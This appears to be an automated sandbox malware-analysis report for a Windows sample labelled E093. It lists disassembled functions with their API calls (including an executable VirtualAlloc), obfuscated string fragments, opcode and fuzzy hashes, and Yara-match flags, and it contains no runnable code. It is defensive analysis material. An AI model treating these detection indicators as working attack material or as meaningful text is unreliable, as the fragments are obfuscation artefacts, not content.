Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

Function 0040C550 Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

Function 0040C583 Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

Function 0043AA80 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8

Function 00999D6D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00999DBE

Memory Dump Source

Source File: 00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp, Offset: 00999000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_999000_E093.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 98146a1687e48058e6ba25a724abc4e28a888344a5a4da2dba8ffff320633342
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 47113979A00208EFDB01DF98C985E98BBF5EF09351F0580A4F9489B362D771EA90DF80

Non-executed Functions

Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON

Download Yara Rule

Strings

l+X-, xrefs: 004272FE
NO, xrefs: 00427361
EG, xrefs: 0042740B
w?n!, xrefs: 004272DD
+K!M, xrefs: 00427356
bweM, xrefs: 004276F0
>C7E, xrefs: 00427340
UGBY, xrefs: 00427708
g#X%, xrefs: 004272E8
$&, xrefs: 004275AF
FOEH, xrefs: 0042771E
{7y9, xrefs: 004272C7
!, xrefs: 00427452
*W.Y, xrefs: 0042731F
U'g), xrefs: 004272F3
;[0], xrefs: 0042732A

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
API String ID: 0-3492884535
Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A

Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON

Download Yara Rule

Strings

WE, xrefs: 00423D04
7N1@, xrefs: 00423ED0, 00423EE1
OU, xrefs: 00423CFC
A[, xrefs: 00423D14
/G$I, xrefs: 00423E16
Fg)i, xrefs: 00423E56
{\}, xrefs: 00423E3E

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
API String ID: 0-1763234448
Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

Function 00419F30 Relevance: 12.2, APIs: 2, Strings: 4, Instructions: 1664COMMON

Download Yara Rule

APIs

Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

FreeLibrary.KERNEL32(?), ref: 0041A6BD
FreeLibrary.KERNEL32(?), ref: 0041A77B

Strings

/,-, xrefs: 0041A991
46, xrefs: 0041A3EA
v, xrefs: 0041A6BD, 0041A77B
/ , xrefs: 0041A402

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: / $/,-$v$46
API String ID: 764372645-907114598
Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B

Function 0041CB40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON

Download Yara Rule

Strings

KT, xrefs: 0041CF31
Q, xrefs: 0041CF39
0u4w, xrefs: 0041D236
xy, xrefs: 0041D23E
SV, xrefs: 0041CF29
_q, xrefs: 0041D1C5
qr, xrefs: 0041D063
p8`;, xrefs: 0041CDBD

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
API String ID: 0-1826372655
Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A

Function 0090A197 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0090A924
FreeLibrary.KERNEL32(?), ref: 0090A9E2

Strings

/,-, xrefs: 0090ABF8
46, xrefs: 0090A651
/ , xrefs: 0090A669

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: / $/,-$46
API String ID: 3664257935-479303636
Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
Instruction ID: 019e96b3673d02bc66d71effbc6e6ca27112f7c427e1792c78892407db914dfe
Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
Instruction Fuzzy Hash: 31B255766483409FE3208B95D884B6FBBE3ABD5300F1CC82DE9D49B295D7759C458B83

Function 00415799 Relevance: 9.2, Strings: 7, Instructions: 492COMMON

Download Yara Rule

Strings

~, xrefs: 0041596E
NDNK, xrefs: 00415D85
<I2K, xrefs: 00415C2B
8MNO, xrefs: 00415C36
oA&C, xrefs: 00415CE6
X, xrefs: 00415DD2
RXA, xrefs: 00415842

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
API String ID: 0-3328159043
Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

Function 00408F50 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

wkw6, xrefs: 00409045
z/6q, xrefs: 0040903D
ye{|, xrefs: 00409035
x|j~, xrefs: 0040904D
(, xrefs: 00409065
|$Nb, xrefs: 00409025
jqci, xrefs: 0040901D

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A

Function 008F91B7 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

ye{|, xrefs: 008F929C
(, xrefs: 008F92CC
|$Nb, xrefs: 008F928C
jqci, xrefs: 008F9284
wkw6, xrefs: 008F92AC
x|j~, xrefs: 008F92B4
z/6q, xrefs: 008F92A4

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 1a5a4e08f33129ed8386ce6e44e75970cd92cf0d137338e8c8f1b6a58c786ee0
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: C661076154C3C68AD3118F39889077AFFE0EFA2314F18596DE5D18B392D379C6099716

Function 00409580 Relevance: 7.9, Strings: 6, Instructions: 442COMMON

Download Yara Rule

Strings

#4<7, xrefs: 00409772
\, xrefs: 0040978A
Tiec, xrefs: 00409963
+8=>, xrefs: 00409782
r, xrefs: 004095F4
PK, xrefs: 004099E1

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: #4<7$+8=>$PK$Tiec$\$r
API String ID: 0-1906979145
Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46

Function 008F97E7 Relevance: 7.9, Strings: 6, Instructions: 442COMMON

Download Yara Rule

Strings

+8=>, xrefs: 008F99E9
Tiec, xrefs: 008F9BCA
\, xrefs: 008F99F1
r, xrefs: 008F985B
PK, xrefs: 008F9C48
#4<7, xrefs: 008F99D9

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: #4<7$+8=>$PK$Tiec$\$r
API String ID: 0-1906979145
Opcode ID: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
Instruction ID: 26f7b76e6629fd126f10f5b09b7d76e85e661fc8a6f3141cd67e0dc4f69b0014
Opcode Fuzzy Hash: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
Instruction Fuzzy Hash: 71D12276A083448BD718CF35C8916ABBBE2EFD1318F18892DE5E6DB251D738C905CB46

Function 008F8AB7 Relevance: 7.7, APIs: 5, Instructions: 194threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 008F8B83
GetCurrentThreadId.KERNEL32 ref: 008F8B8C
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 008F8C42
GetForegroundWindow.USER32 ref: 008F8C9A

Part of subcall function 008FC7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 008FC7CA

Part of subcall function 008FB5F7: FreeLibrary.KERNEL32(008F8D1F), ref: 008FB5FD
Part of subcall function 008FB5F7: FreeLibrary.KERNEL32 ref: 008FB61E

ExitProcess.KERNEL32 ref: 008F8D38

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
Instruction ID: 70b27bfda2660bcba3cde8d69f292e2291d8b11ce88bc01c55200924f75332d2
Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
Instruction Fuzzy Hash: B15197BBF102180BD72CAEB9CC5A7A975879BC5710F1E823D5A45DB3D5EDB88C0182C5

Function 0041E7C0 Relevance: 5.8, Strings: 4, Instructions: 779COMMON

Download Yara Rule

Strings

hI, xrefs: 0041E98F
/, xrefs: 0041E9BE
-+, xrefs: 0041F11A
", xrefs: 0041F121

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: "$-+$/$hI
API String ID: 0-2772680581
Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A

Function 0090EA27 Relevance: 5.8, Strings: 4, Instructions: 779COMMON

Download Yara Rule

Strings

-+, xrefs: 0090F381
/, xrefs: 0090EC25
", xrefs: 0090F388
hI, xrefs: 0090EBF6

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: "$-+$/$hI
API String ID: 0-2772680581
Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
Instruction ID: cdc1261ca99123335ee7c1f5ecfdbc5138d8691568be98d1c0d5c61a27d4aacc
Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
Instruction Fuzzy Hash: 7542387150C3918FD721CF24C850A6EBBE1AF91314F188A6DE8E59B3D2D736DA05CB52

Function 0090D230 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

qr, xrefs: 0090D2CA
0u4w, xrefs: 0090D49D
_q, xrefs: 0090D42C
xy, xrefs: 0090D4A5

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: 0u4w$_q$qr$xy
API String ID: 0-1225007230
Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
Instruction ID: 8c50e120634c883145689e07a06161c33d5ad2ced0793024ded2b3952e993d00
Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
Instruction Fuzzy Hash: A991F2B1A093118BC714CF98C89276BB7F1EF95324F18992CE8CA8B3D5E3749905C756

Function 0042CA49 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96

Function 0091CCB0 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

bc, xrefs: 0091D104
v, xrefs: 0091D02D
,JHj, xrefs: 0091CFC4
Hs, xrefs: 0091CF4A

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction ID: 5b55be5319e10e87226b8f200840789499a370fbd82a00e85269f7de6df22e83
Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction Fuzzy Hash: 11917A71A0C3D08BE3358B3984517EBBBD29FE3314F19896DD4DA9B382CA754845CB92

Function 0042CB22 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96

Function 0091CD89 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

bc, xrefs: 0091D104
v, xrefs: 0091D02D
,JHj, xrefs: 0091CFC4
Hs, xrefs: 0091CF4A

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction ID: 60fe98f5897d303c7bf1a44f07d280585563916e0bc516d3dde370b12841d9ef
Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction Fuzzy Hash: 0A917B71A0C3D08BE3348B3584517EBBBD29FE3314F18896DC4D99B782CA754845CB92

Function 0042CAD0 Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96

Function 0091CD37 Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

bc, xrefs: 0091D104
v, xrefs: 0091D02D
,JHj, xrefs: 0091CFC4
Hs, xrefs: 0091CF4A

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction ID: 6193b81f56ff2fad316dd4586d4acbf310bfef3f31fe2c41d47785b3bb80a294
Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction Fuzzy Hash: 36918B71A0C3D08BE3358B3984517EBBBD29FE3314F18896DD4D99B782CA754809CB52

Function 0042CB11 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96

